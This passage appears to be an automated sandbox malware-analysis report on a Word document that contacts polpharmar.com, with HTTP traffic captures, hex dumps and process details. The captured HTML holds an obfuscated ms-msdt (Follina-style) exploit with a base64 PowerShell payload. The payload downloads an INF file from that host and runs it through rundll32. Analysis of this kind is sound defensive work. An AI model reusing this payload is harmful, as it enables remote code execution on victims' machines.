5a 70 62 47 55 6f 4d 43 77 69 61 48 52 30 63 44 6f 76 4c 33 42 76 62 48 42 6f 59 58 4a 74 59 58 49 75 59 32 39 74 4c 33 52 6c 63 33 51 75 61 57 35 6d 49 69 77 69 4a 47 56 75 64 6a 70 42 55 46 42 45 51 56 52 42 58 48 52 6c 63 33 51 75 61 57 35 6d 49 69 77 77 4c 44 41 70 4f 31 4e 55 59 58 4a 30 4c 58 4e 4d 52 57 56 51 4b 44 4d 70 4f 31 4a 31 62 6b 52 73 62 44 4d 79 4c 6b 56 59 5a 53 42 68 5a 48 5a 77 51 57 4e 4c 4c 6d 52 73 54 43 78 4d 59 58 56 75 59 32 68 4a 54 6b 5a 54 5a 57 4e 30 61 57 39 75 52 58 67 67 49 69 52 6c 54 6c 59 36 51 56 42 51 52 45 46 55 51 56 78 30 5a 58 4e
            Data Ascii: <!dOcTypE HTml><HTmL><boDY><SCrIpT typE="text/JScript">location.href = "m" + "s-msdt:/" + "ID" + " " + "PcwdiAgnOSTi" + "C" + " " + "-sKi" + "P" + " " + "for" + "C" + "e" + " " + "-pArA" + "m" + " " + "\"" + "IT_ReBRowseforfiL" + "E" + "=" + "#Ja2Y" + " " + "IT_LaunchMethod=Context" + "Menu" + " " + "IT_BrowseForFi" + "l" + "e=" + "W5A$(" + "Iex($(IeX('[sYSTem.teXt.enCODinG]'+[cHar]58+[chAR]58+'uTf8.geTStRiNg([sYStem.CoNVErT]'+[char]58+" + "[char]0x3A+'fRombASe64StRINg('+[CHar]0X22+'U1RPcC1Qck9jZXNTIC1mb1JjZSAtTmFNZSAnbXNkdCc7JEtZID0gYWRkLXRZUEUgLW1lbUJlcmRFRmluaVRJT04gJ1tEbGxJbXBvcnQoIlVSbG1vTi5EbEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIFIsc3RyaW5nIGJpTCxzdHJpbmcgdXdlLHVpbnQgUm5vLEludFB0ciB1Ryk7JyAtbkFtRSAiWXZRIiAtTkF" + "tRVNQYUNlIEhLZyAtUGFzc1RocnU7ICRLWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovL3BvbHBoYXJtYXIuY29tL3Rlc3QuaW5mIiwiJGVudjpBUFBEQVRBXHRlc3QuaW5mIiwwLDApO1NUYXJ0LXNMRWVQKDMpO1J1bkRsbDMyLkVYZSBhZHZwQWNLLmRsTCxMYXVuY2hJTkZTZWN0aW9uRXggIiRlTlY6QVBQREFUQVx0ZXN
            Aug 1, 2022 10:49:52.950459957 CEST9INData Raw: 30 4c 6d 6c 75 5a 69 49 73 52 45 56 6d 51 58 56 73 64 45 6c 75 63 31 52 42 62 47 78 66 55 30 22 20 20 2b 20 22 6c 75 5a 32 78 46 56 56 4e 22 20 20 2b 20 22 46 63 69 77 69 4a 47 56 4f 64 6a 70 42 55 46 42 45 51 56 52 42 58 48 52 6c 63 33 51 75 61
            Data Ascii: 0LmluZiIsREVmQXVsdEluc1RBbGxfU0" + "luZ2xFVVN" + "FciwiJGVOdjpBUFBEQVRBXHRlc3QuaW5mIiw0LDA7U1RvUC1QUm9jRVNTIC1Gb3JDZSAtTmFNZSAnc2RpYWduaG9zdCc='+[CHar]34+'))')" + ")))x" + "W" + "/../../../../../../../../../../../../../../." + "./" + ".
            Aug 1, 2022 10:49:52.950469017 CEST10INData Raw: 74 54 56 32 67 4e 35 62 48 31 39 62 77 4d 51 42 46 55 39 75 63 77 4b 35 43 39 39 52 71 49 6a 30 59 44 7a 46 79 6f 78 53 47 4f 38 52 39 61 45 49 47 48 39 69 6c 76 39 43 33 30 4a 71 7a 70 45 41 36 5a 7a 43 46 55 4c 31 50 54 43 44 6c 6f 48 76 30 42
            Data Ascii: tTV2gN5bH19bwMQBFU9ucwK5C99RqIj0YDzFyoxSGO8R9aEIGH9ilv9C30JqzpEA6ZzCFUL1PTCDloHv0B7tyvDtQZXK7cBDCWOChwf2PJIExZzq7CwlQStwxviBPE0wU77UShJJtvHksOlqGOWZH4c8I3kg0949eO2OgIidWL63gozh6lmcfHmG71Z73woaKN69XFFlwbeQXM5BHNcBmdm54q4kj8d3A6C5A7KUqjp9ZZT5REw
            Aug 1, 2022 10:49:52.950478077 CEST12INData Raw: 52 73 68 42 64 63 6f 43 6e 68 37 76 30 44 4f 6e 53 72 65 66 43 70 50 6c 35 75 48 30 75 76 73 56 79 50 6b 48 67 4d 71 4d 61 57 31 7a 55 6b 73 39 7a 58 73 4c 38 33 5a 63 50 45 4b 6d 74 37 31 7a 6a 58 42 51 71 32 4b 50 76 76 55 62 59 6c 36 57 67 78
            Data Ascii: RshBdcoCnh7v0DOnSrefCpPl5uH0uvsVyPkHgMqMaW1zUks9zXsL83ZcPEKmt71zjXBQq2KPvvUbYl6Wgx4LNc1sll0s9gEVaZB9WQuOkAgJb5jxRQOBLHPa1mUp6RB7Tmsz7IGLwWkd3SPUBC1PQpOl7ZwA98VpISST2S1GQIq6Jgn8oa5W23cSxOUPhargxs48ggsD5k8GlXXwEql5ZikgQYJ6AXvhMJqUTjSDqBldpoJwLHC
            Aug 1, 2022 10:49:52.950488091 CEST13INData Raw: 6b 59 57 4d 71 6b 64 44 79 61 71 68 50 75 38 42 32 78 51 49 36 70 78 55 48 45 39 79 33 5a 4e 6e 47 38 4a 4a 77 66 4a 6d 4d 36 37 47 51 62 71 6c 43 6d 38 63 69 48 67 37 38 56 70 52 7a 63 65 6d 71 70 33 67 30 76 48 6d 69 7a 5a 61 53 55 41 6a 54 54
            Data Ascii: kYWMqkdDyaqhPu8B2xQI6pxUHE9y3ZNnG8JJwfJmM67GQbqlCm8ciHg78VpRzcemqp3g0vHmizZaSUAjTTVFd5cJXOt3mN0mc99GhWQUCmaRAd2L2YvyVFgLcRja4tM5kdzqfWeBxybbC2Kt2Zna0pnWZBkpVCaxPo0Bbvs988zqCkyfd3Xqmpr7X9MXkJcgjDZ47nzgumAxrmswzWXYTJlOfryVTHLZtO7Ht8v2QRYjnCvzFWE
            Aug 1, 2022 10:49:52.950506926 CEST14INData Raw: 53 42 71 71 67 62 68 48 66 31 61 51 79 36 5a 78 41 53 76 72 6e 6c 69 6b 62 37 63 4e 77 6b 33 4c 56 73 52 42 49 70 6f 61 6e 54 65 76 51 71 78 31 48 30 5a 43 32 44 6b 53 42 4c 7a 34 53 52 41 4a 5a 69 6d 57 39 62 58 49 76 41 46 33 45 70 72 6d 65 36
            Data Ascii: SBqqgbhHf1aQy6ZxASvrnlikb7cNwk3LVsRBIpoanTevQqx1H0ZC2DkSBLz4SRAJZimW9bXIvAF3Eprme6m3yrSKThEPGWOE4VWu8C1yTt2rHKRjdXDTVz1vsyzQGGtcP2KMBtR7qPgMTdrQf5YTWqaknvwANxmzz4quAzwGQVpbi1HOAYQ5xkJMeMheUsGuEOka1lgxdx8bvmr8VhVKiwLHp2yvWIStWnfRdTojtZGO0CjE6IR
            Aug 1, 2022 10:49:52.950521946 CEST16INData Raw: 46 61 36 72 6a 38 59 50 6b 4e 4b 77 70 51 56 61 61 49 69 6e 6d 58 70 42 63 48 30 66 4f 58 6d 74 45 67 63 72 45 45 57 6d 6e 70 35 47 41 61 61 67 46 55 5a 70 6c 49 51 6e 55 4f 51 37 75 46 72 41 7a 6a 5a 6c 46 32 61 37 41 63 38 76 66 53 6b 70 30 64
            Data Ascii: Fa6rj8YPkNKwpQVaaIinmXpBcH0fOXmtEgcrEEWmnp5GAaagFUZplIQnUOQ7uFrAzjZlF2a7Ac8vfSkp0dqvq2JnVLaahRhNAjsrv59DUkNFVbNnWlPL9HuwKAOKseiJRkRQQvcqRFkUpXsNSuBOsab1asmddQJkRmAlu5OogB7vnnfMS65K9TopxWdm6ItSqsx8W5ttqXQqYt9WBM0R8Tw757r2RmsFI3joQSVqbNYXHNjdHjr
            Aug 1, 2022 10:49:52.950537920 CEST17INData Raw: 6a 36 4b 31 54 52 6a 6a 6c 5a 64 50 76 6c 47 34 54 6e 50 47 49 4a 36 63 36 58 70 61 36 35 6a 52 31 39 4a 5a 45 75 41 30 47 35 35 38 53 77 50 6d 7a 4b 61 4f 78 41 7a 65 7a 7a 32 38 6e 76 54 53 45 6b 79 50 50 4b 76 58 47 4a 62 75 39 74 50 37 72 32
            Data Ascii: j6K1TRjjlZdPvlG4TnPGIJ6c6Xpa65jR19JZEuA0G558SwPmzKaOxAzezz28nvTSEkyPPKvXGJbu9tP7r2UYlsXvLKuzqwvdF8Q2QWgKhYMEPQx7zCII5EPV4nageviyydr1gF4RR5VedIgoI598M1FP3hEjdeXWKUQrZHmtPBBhDKFEg0Ccz0jfEJzfBu1JE1G6WQRjV7YuaGJP4CcGMzUJUu11iTpNYTYHvQixeCmo8tXMKzZ
            Aug 1, 2022 10:49:52.950552940 CEST18INData Raw: 77 78 70 54 75 78 52 79 5a 62 6c 52 42 31 30 57 6e 70 70 56 65 42 4d 51 66 32 48 53 4f 65 4f 61 79 4d 45 51 57 61 35 54 6b 36 42 4e 67 62 37 66 70 4b 5a 62 55 47 46 49 4a 47 39 43 38 63 76 61 32 70 65 62 6c 64 69 4a 38 43 36 36 34 6a 6f 4d 55 42
            Data Ascii: wxpTuxRyZblRB10WnppVeBMQf2HSOeOayMEQWa5Tk6BNgb7fpKZbUGFIJG9C8cva2pebldiJ8C664joMUBVImIZAFqDb5AzGKvTmF8CmuOvO1Ryrxu5N9IDIeIsTvJUuzA8if8U8EF22AnWTM2gdGI6yeBYZJ6KnB41DfeRhDHrnCmNSr6ipnK8TR0cgtZOD2BX4ti0i42nTjTP6cdalNRC58JWcJjcQk2710N4Uu1FqSrXhoBh
            Aug 1, 2022 10:49:52.950567007 CEST19INData Raw: 72 44 63 52 67 68 56 77 6c 72 33 55 71 70 77 70 41 32 70 68 34 78 56 65 58 73 38 79 45 34 73 7a 69 47 68 63 70 41 53 35 53 54 45 78 54 73 76 4f 75 61 31 68 52 73 6a 33 35 31 4a 59 39 51 62 52 51 30 75 66 65 71 30 63 44 36 61 39 38 35 68 71 42 6a
            Data Ascii: rDcRghVwlr3UqpwpA2ph4xVeXs8yE4sziGhcpAS5STExTsvOua1hRsj351JY9QbRQ0ufeq0cD6a985hqBjfYR8A6uaUNXZCYNEub31L4SYl7jkPkQFRJy2wLQLKVJmorzjLSwxczaaPtA6Db1vy1xqFJ15TwONbugHtGFxys0zDVMTGxOXwgIqCW7bajgaiCqfB2qIZI8XnyD7jKwszLtKyW6eJt4jKIsetqeFZlM1qLdKlG4im
            Aug 1, 2022 10:49:53.274751902 CEST20OUTHEAD /test.html HTTP/1.1
            User-Agent: Microsoft Office Existence Discovery
            Host: polpharmar.com
            Content-Length: 0
            Connection: Keep-Alive
            Aug 1, 2022 10:49:53.324143887 CEST20INHTTP/1.1 200 OK
            Date: Mon, 01 Aug 2022 08:49:53 GMT
            Server: Apache
            Last-Modified: Sun, 31 Jul 2022 09:45:54 GMT
            Accept-Ranges: bytes
            Content-Length: 12744
            Keep-Alive: timeout=5, max=99
            Connection: Keep-Alive
            Content-Type: text/html
            Aug 1, 2022 10:49:53.569763899 CEST20OUTHEAD /test.html HTTP/1.1
            User-Agent: Microsoft Office Existence Discovery
            Host: polpharmar.com
            Content-Length: 0
            Connection: Keep-Alive
            Aug 1, 2022 10:49:53.619056940 CEST21INHTTP/1.1 200 OK
            Date: Mon, 01 Aug 2022 08:49:53 GMT
            Server: Apache
            Last-Modified: Sun, 31 Jul 2022 09:45:54 GMT
            Accept-Ranges: bytes
            Content-Length: 12744
            Keep-Alive: timeout=5, max=98
            Connection: Keep-Alive
            Content-Type: text/html
            Aug 1, 2022 10:49:56.855813026 CEST24OUTGET /test.html HTTP/1.1
            Accept: */*
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
            UA-CPU: AMD64
            Accept-Encoding: gzip, deflate
            Host: polpharmar.com
            If-Modified-Since: Sun, 31 Jul 2022 09:45:54 GMT
            Connection: Keep-Alive
            Aug 1, 2022 10:49:56.904831886 CEST25INHTTP/1.1 304 Not Modified
            Date: Mon, 01 Aug 2022 08:49:56 GMT
            Server: Apache
            Last-Modified: Sun, 31 Jul 2022 09:45:54 GMT
            Accept-Ranges: bytes
            Keep-Alive: timeout=5, max=97
            Connection: Keep-Alive
            Aug 1, 2022 10:49:56.926876068 CEST25OUTHEAD /test.html HTTP/1.1
            User-Agent: Microsoft Office Existence Discovery
            Host: polpharmar.com
            Content-Length: 0
            Connection: Keep-Alive
            Aug 1, 2022 10:49:56.976238966 CEST25INHTTP/1.1 200 OK
            Date: Mon, 01 Aug 2022 08:49:56 GMT
            Server: Apache
            Last-Modified: Sun, 31 Jul 2022 09:45:54 GMT
            Accept-Ranges: bytes
            Content-Length: 12744
            Keep-Alive: timeout=5, max=96
            Connection: Keep-Alive
            Content-Type: text/html
            Aug 1, 2022 10:49:57.166090012 CEST26OUTHEAD /test.html HTTP/1.1
            User-Agent: Microsoft Office Existence Discovery
            Host: polpharmar.com
            Content-Length: 0
            Connection: Keep-Alive
            Aug 1, 2022 10:49:57.215281963 CEST26INHTTP/1.1 200 OK
            Date: Mon, 01 Aug 2022 08:49:57 GMT
            Server: Apache
            Last-Modified: Sun, 31 Jul 2022 09:45:54 GMT
            Accept-Ranges: bytes
            Content-Length: 12744
            Keep-Alive: timeout=5, max=95
            Connection: Keep-Alive
            Content-Type: text/html


            Session IDSource IPSource PortDestination IPDestination PortProcess
            4192.168.2.224917591.235.116.18080C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            TimestampkBytes transferredDirectionData
            Aug 1, 2022 10:49:54.392364979 CEST21OUTHEAD /test.html HTTP/1.1
            Connection: Keep-Alive
            User-Agent: Microsoft Office Existence Discovery
            Host: polpharmar.com
            Aug 1, 2022 10:49:54.441466093 CEST22INHTTP/1.1 200 OK
            Date: Mon, 01 Aug 2022 08:49:54 GMT
            Server: Apache
            Last-Modified: Sun, 31 Jul 2022 09:45:54 GMT
            Accept-Ranges: bytes
            Content-Length: 12744
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: text/html
            Aug 1, 2022 10:49:54.690577030 CEST22INHTTP/1.1 200 OK
            Date: Mon, 01 Aug 2022 08:49:54 GMT
            Server: Apache
            Last-Modified: Sun, 31 Jul 2022 09:45:54 GMT
            Accept-Ranges: bytes
            Content-Length: 12744
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: text/html


            Click to jump to process

            Click to jump to process

            Click to dive into process behavior distribution

            Target ID:0
            Start time:10:49:20
            Start date:01/08/2022
            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
            Imagebase:0x13f390000
            File size:1423704 bytes
            MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            No disassembly